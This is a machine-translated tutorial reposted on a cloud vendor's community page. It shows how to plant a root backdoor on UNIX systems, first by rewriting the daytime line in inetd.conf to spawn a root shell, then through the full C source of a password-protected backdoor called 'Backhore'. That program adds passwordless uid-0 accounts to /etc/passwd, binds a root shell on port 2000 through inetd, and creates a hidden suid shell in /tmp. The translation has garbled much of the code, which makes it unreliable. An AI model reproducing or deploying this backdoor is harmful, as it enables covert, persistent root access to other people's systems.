Create a UNIX backdoor (intermediate)

Source: Internet
Author: User
Tags password protection

Configuration file of the super server daemon inetd. Generally, the system administrator does not check the file frequently. Therefore, this is a good place to place a "backdoor. :) So how to build the best backdoor here? Of course it is remote. In this way, you do not need a local account to become the root user. First, let's take a look at the basic knowledge in this regard: the inetd process is responsible for listening to the connection requests of various TCP and UDP ports, and starting the corresponding server process according to the connection requests. The configuration file/etc/inetd. conf is very simple. The basic form is as follows:

(1) (2) (3) (4) (5) (6) (7)
Ftp stream tcp nowait root/usr/etc/ftpd
Talk dgram udp wait root/usr/etc/ntalkd
Mountd/1 stream rpc/tcp wait root/usr/etc/mountd

1: The first column is the service name. The service name is mapped to the port number by querying the/etc/services file for the TCP and UDP services) or the portmap daemon for the RPC service. RPC remote process call) the service is identified by the name format of name/num and the rpc flag in the third column.

2: The second column determines the set of API types used by the Service: stream, dgram, or raw. Generally, stream is used for TCP services, while dgram is used for UDP. raw is rarely used.

3: The third column identifies the communication protocol used by the Service. The allowed types are listed in the protocols file. The Protocol is almost always tcp or udp. The RPC service is named rpc/before the protocol type /.

4: if the specified service can process multiple requests at a time rather than exit after processing one request), the fourth column should be set to wait, this prevents inetd from continuously deriving new copies of the daemon. This option is used to process a large number of small requests. If wait is not suitable, enter nowait in this field.

5: the username used to run the daemon is displayed in the Fifth Column.

6: The fully qualified path name of the daemon is displayed in column 6.

7: The real name and parameters of the daemon.

If the work to be processed is insignificant (if user interaction is not required), the inetd daemon processes the tasks by itself. In this case, you only need to fill in 'internal' in column 6 and column 7. Therefore, to install a convenient backdoor, you can select a service that is not frequently used and use a daemon that can generate a backdoor to replace the original daemon. For example, you can add an account with UID 0 or copy a suid shell.

One of the better methods is to replace the service daytime used to provide the date and time with the shell that can generate a suid root. In the/etc/inetd. conf file:

Daytime stream tcp nowait root internal

To:

Daytime stream tcp nowait/bin/sh-I.

Restart And remember: You must restart the inetd process:

Killall-9 inetd.

But a better and more concealed method is to forge a network service so that it can provide backdoors, such as password protection, to us even more imperceptible. It would be great if you could easily remotely access without using the telnetd connection. The method is to bind the "own" daemon to a port. The program does not provide any prompt for external connections, but you only need to enter the correct password to access the system smoothly. The following is a demonstration program for this backdoor. Note: This program is not completely written .)

<++> Backdoor/remoteback. c
/* Coders:
Theft

Help from:
Sector9, Halogen

Greets: People: Liquid, AntiSocial, Peak, Grimknight, s0ttle, halogen,
Psionic, mongod, Psionic.
Groups: Ethical Mutiny Crew (EMC), Common Purpose hackers (CPH ),
Global Hell (gH), Team Sploit, Hong Kong Danger Duo,
Tg0d, EHAP.
Usage:
Setup:
# Gcc-o backhore. c #./backdoor password &
Run:
Telnet to the host on port 4000. After connected you
Will not be prompted for a password, this way it is less
Obvious, just type the password and press enter, after this
You will be prompted for a command, pick 1-8.

Distributers:
Ethical Mutiny Crew

*/

# Include
# Include
# Include
# Include
# Include
# Include
# Include
# Include


# Define PORT 4000
# Define maxdatasalize 100
# Define BACKLOG 10
# Define SA struct sockaddr

Void handle (int );

Int
Main (int argc, char * argv [])
{
Int sockfd, new_fd, sin_size, numbytes, cmd;
Char ask [10] = "Command :";
Char * bytes, * buf, pass [40];
Struct sockaddr_in my_addr;

Struct sockaddr_in their_addr;

Printf ("\ n Backhore BETA by Theft \ n ");
Printf ("1: trojans rc. local \ n ");
Printf ("2: sends a systemwide message \ n ");
Printf ("3: binds a root shell on port 2000 \ n ");
Printf ("4: creates suid sh in/tmp \ n ");
Printf ("5: creates mutiny account uid 0 no passwd \ n ");
Printf ("6: drops to suid shell \ n ");
Printf ("7: information on backhore \ n ");
Printf ("8: contact \ n ");

If (argc! = 2 ){
Fprintf (stderr, "Usage: % s password \ n", argv [0]);
Exit (1 );
}

Strncpy (pass, argv [1], 40 );
Printf (".. using password: % s .. \ n", pass );


If (sockfd = socket (AF_INET, SOCK_STREAM, 0) =-1 ){
Perror ("socket ");
Exit (1 );
}

My_addr.sin_family = AF_INET;
My_addr.sin_port = htons (PORT );
My_addr.sin_addr.s_addr = INADDR_ANY;

If (bind (sockfd, (SA *) & my_addr, sizeof (SA) =-1 ){

Perror ("bind ");
Exit (1 );
}

If (listen (sockfd, BACKLOG) =-1 ){
Perror ("listen ");
Exit (1 );
}

Sin_size = sizeof (SA );
While (1) {/* main accept () loop */
If (new_fd = accept (sockfd, (SA *) & their_addr, & sin_size) =-1 ){
Perror ("accept ");
Continue;
}
If (! Fork ()){
Dup2 (new_fd, 0 );
Dup2 (new_fd, 1 );
Dup2 (new_fd, 2 );
Fgets (buf, 40, stdin );
If (! Strcmp (buf, pass )){
Printf ("% s", ask );
Cmd = getchar ();
Handle (cmd );
}
Close (new_fd );
Exit (0 );
}
Close (new_fd );
While (waitpid (-1, NULL, WNOHANG)> 0);/* rape the dying children */
}
}


Void
Handle (int cmd)
{
FILE * fd;

Switch (cmd ){
Case '1 ':
Printf ("\ nBackhore BETA by Theft \ n ");
Printf ("theft@cyberspace.org \ n ");
Printf ("Trojaning rc. local \ n ");
Fd = fopen ("/etc/passwd", "a + ");
Fprintf (fd, "mutiny: 0: 0: ethical mutiny crew:/root:/bin/sh ");
Fclose (fd );
Printf ("Trojan complete. \ n ");
Break;
Case '2 ':
Printf ("\ nBackhore BETA by Theft \ n ");
Printf ("theft@cyberspace.org \ n <");
Printf ("Sending systemwide message... \ n ");
System ("wall Box owned via the Ethical Mutiny Crew ");
Printf ("Message sent. \ n ");
Break;
Case '3 ':
Printf ("\ nBackhore BETA by Theft \ n ");
Printf ("=" mailto: theft@cyberspace.org \ n "> theft@cyberspace.org \ n ");
Printf ("\ nAdding inetd backdoor... (-p) \ n ");
Fd = fopen ("/etc/services", "a + ");
Fprintf (fd, "backdoor \ t2000/tcp \ tbackdoor \ n ");
Fd = fopen ("/etc/inetd. conf", "a + ");
Fprintf (fd, "backdoor \ tstream \ ttcp \ tnowait \ troot \ t/bin/sh-I \ n ");
Execl ("killall", "-HUP", "inetd", NULL );
Printf ("\ ndone. \ n ");
Printf ("telnet to port 2000 \ n ");
Break;
Case '4 ':
Printf ("\ nBackhore BETA by Theft \ n ");
Printf ("=" mailto: theft@cyberspace.org \ n "> theft@cyberspace.org \ n ");
Printf ("\ nAdding Suid Shell... (-s) \ n ");
System ("cp/bin/sh/tmp/. sh ");
System (& quot; chmod 4700/tmp/. sh & quot ");
System ("chown root: root/tmp/. sh ");
Printf ("\ nSuid shell added. \ n ");
Printf ("execute/tmp/. sh \ n ");
Break;
Case '5 ':
Printf ("\ nBackhore BETA by Theft \ n ");
Theft@cyberspace.org \ n ");
Printf ("\ nAdding root account... (-u) \ n ");
Fd = fopen ("/etc/passwd", "a + ");
Fprintf (fd, "hax0r: 0: 0: // bin/bash \ n ");
Printf ("\ ndone. \ n ");
Printf ("uid 0 and gid 0 account added \ n ");
Break;
Case '6 ':
Printf ("\ nBackhore BETA by Theft \ n ");
Printf ("theft@cyberspace.org \ n <");
Printf ("Executing suid shell .. \ n ");

Execl ("/bin/sh ");
Break;
Case '7 ':
Printf ("\ nBackhore BETA by Theft \ n ");
Printf ("theft@cyberspace.org \ n ");
Printf ("\ nInfo... (-I) \ n ");
Printf ("\ n3-Adds entries to/etc/services &/etc/inetd. conf giving you \ n ");
Printf ("a root shell on port 2000. example: telnet 2000 \ n ");
Printf ("4-Creates a copy of/bin/sh to/tmp/. sh which, whenever \ n ");
Printf ("executed gives you a root shell. example:/tmp/. sh \ n ");
Printf ("5-Adds an account with uid and gid 0 to the passwd file. \ n ");
Printf ("The login is 'mutiny' and there is no passwd .");
Break;
Case '8 ':
Printf ("\ nBackhore BETA by Theft \ n ");
Printf ("\ http://theft.bored.org \ n ");
Printf (theft@cyberspace.org \ n ");
Break;
Default:
Printf ("unknown command: % d \ n", cmd );
Break;
}
}
<-->

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.